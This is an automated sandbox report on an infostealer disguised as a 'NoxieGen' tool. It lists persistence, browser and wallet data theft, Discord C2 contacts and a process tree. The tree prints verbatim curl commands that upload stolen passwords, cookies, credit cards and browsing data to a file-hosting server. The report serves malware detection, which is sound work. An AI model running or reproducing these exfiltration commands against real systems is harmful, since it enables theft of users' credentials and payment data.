hxxps://gofile[.]io/d/LOwIP7

Analysis

max time kernel
150s
max time network
157s
platform
windows10-2004_x64
resource
win10v2004-20231215-en
resource tags

arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
submitted
19/02/2024, 23:38

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

https://gofile.io/d/LOwIP7

Score

7^/10

persistence pyinstaller spyware stealer

Malware Config

Signatures

Drops startup file 2 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPICGA~1.EXE	EPICGA~1.EXE
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EPICGA~1.EXE	EPICGA~1.EXE

Executes dropped EXE 8 IoCs

pid	Process
3224	NoxieV1.33.exe
1328	acq1.EXE
1020	EPICGA~1.EXE
4028	EPICGA~1.EXE
408	NoxieV1.33.exe
4184	acq1.EXE
2072	EPICGA~1.EXE
1776	EPICGA~1.EXE

Loads dropped DLL 64 IoCs

pid	Process
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
4028	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE
1776	EPICGA~1.EXE

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\""	NoxieV1.33.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\""	acq1.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\""	NoxieV1.33.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\""	acq1.EXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 17 IoCs

Web Service

T1102

flow	ioc
141	discord.com
144	discord.com
148	discord.com
149	discord.com
122	discord.com
134	discord.com
136	discord.com
139	discord.com
128	discord.com
133	discord.com
135	discord.com
138	discord.com
140	discord.com
153	discord.com
123	discord.com
137	discord.com
151	discord.com

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
112	api.ipify.org
113	api.ipify.org
129	api.ipify.org

Detects Pyinstaller 4 IoCs

pyinstaller

resource	yara_rule
behavioral1/files/0x000300000000073b-176.dat	pyinstaller
behavioral1/files/0x000300000000073b-177.dat	pyinstaller
behavioral1/files/0x000300000000073b-277.dat	pyinstaller
behavioral1/files/0x000600000002328b-336.dat	pyinstaller

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133528595465622999"	chrome.exe

Modifies registry class 1 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-635608581-3370340891-292606865-1000_Classes\Local Settings	chrome.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
1056	NOTEPAD.EXE

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
2560	chrome.exe
2560	chrome.exe
1708	chrome.exe
1708	chrome.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
1200	7zFM.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe
Token: SeShutdownPrivilege	2560	chrome.exe
Token: SeCreatePagefilePrivilege	2560	chrome.exe

Suspicious use of FindShellTrayWindow 41 IoCs

pid	Process
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
1200	7zFM.exe
1200	7zFM.exe
1200	7zFM.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe
2560	chrome.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2560 wrote to memory of 3784	2560	chrome.exe	84
PID 2560 wrote to memory of 3784	2560	chrome.exe	84
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 2196	2560	chrome.exe	86
PID 2560 wrote to memory of 380	2560	chrome.exe	90
PID 2560 wrote to memory of 380	2560	chrome.exe	90
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87
PID 2560 wrote to memory of 116	2560	chrome.exe	87

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://gofile.io/d/LOwIP7
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa67a99758,0x7ffa67a99768,0x7ffa67a99778
  2⤵
  PID:3784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1744 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:2
  2⤵
  PID:2196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2216 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:8
  2⤵
  PID:116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3096 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:1
  2⤵
  PID:992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=2956 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:1
  2⤵
  PID:1196
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2172 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:8
  2⤵
  PID:380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4884 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:1
  2⤵
  PID:688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4888 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:8
  2⤵
  PID:1248
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5176 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:8
  2⤵
  PID:3608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=1720 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:1
  2⤵
  PID:392
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=5456 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:1
  2⤵
  PID:4404
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=5684 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:1
  2⤵
  PID:784
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5936 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:8
  2⤵
  PID:4124
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=996 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:8
  2⤵
  PID:560
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4756 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:8
  2⤵
  PID:3076
- C:\Program Files\7-Zip\7zFM.exe
  "C:\Program Files\7-Zip\7zFM.exe" "C:\Users\Admin\Downloads\NoxieGenV1.rar"
  2⤵
  - Suspicious behavior: GetForegroundWindowSpam
  - Suspicious use of FindShellTrayWindow
  PID:1200
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1716 --field-trial-handle=1940,i,1986479599371149172,16733072566985957248,131072 /prefetch:2
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1708

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3416

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3748

C:\Users\Admin\Downloads\NoxieGenV1\NoxieV1.33.exe
"C:\Users\Admin\Downloads\NoxieGenV1\NoxieV1.33.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:3224
- C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\acq1.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\acq1.EXE
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:1328
- - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EPICGA~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EPICGA~1.EXE
    3⤵
    - Executes dropped EXE
    PID:1020
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EPICGA~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\EPICGA~1.EXE
      4⤵
      Drops startup file
      Executes dropped EXE
      Loads dropped DLL
      PID:4028
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:3624
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile"
        5⤵
        
        PID:2296
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile
        6⤵
        
        PID:3128
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile"
        5⤵
        
        PID:2276
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile
        6⤵
        
        PID:648
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile"
        5⤵
        
        PID:2408
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile
        6⤵
        
        PID:744
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile"
        5⤵
        
        PID:4068
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csautofills.txt" https://store9.gofile.io/uploadFile
        6⤵
        
        PID:184
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile"
        5⤵
        
        PID:5096
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cshistories.txt" https://store9.gofile.io/uploadFile
        6⤵
        
        PID:3292
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile"
        5⤵
        
        PID:1828
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\csbookmarks.txt" https://store9.gofile.io/uploadFile
        6⤵
        
        PID:3624

C:\Windows\system32\NOTEPAD.EXE
"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Downloads\NoxieGenV1\validaccs.txt
1⤵
- Opens file in notepad (likely ransom note)
PID:1056

C:\Users\Admin\Downloads\NoxieGenV1\NoxieV1.33.exe
"C:\Users\Admin\Downloads\NoxieGenV1\NoxieV1.33.exe"
1⤵
- Executes dropped EXE
- Adds Run key to start application
PID:408
- C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\acq1.EXE
  C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\acq1.EXE
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4184
- - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE
    C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE
    3⤵
    - Executes dropped EXE
    PID:2072
  - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE
      C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\EPICGA~1.EXE
      4⤵
      Drops startup file
      Executes dropped EXE
      Loads dropped DLL
      PID:1776
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "ver"
        5⤵
        
        PID:1752
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile"
        5⤵
        
        PID:3492
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cspasswords.txt" https://store9.gofile.io/uploadFile
        6⤵
        
        PID:4772
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile"
        5⤵
        
        PID:3968
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscookies.txt" https://store9.gofile.io/uploadFile
        6⤵
        
        PID:4220
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile"
        5⤵
        
        PID:4728
      - C:\Windows\system32\curl.exe
        
        curl -F "file=@C:\Users\Admin\AppData\Local\Temp\cscreditcards.txt" https://store9.gofile.io/uploadFile
        6⤵
        
        PID:2036
    - - C:\Windows\system32\cmd.exe
        
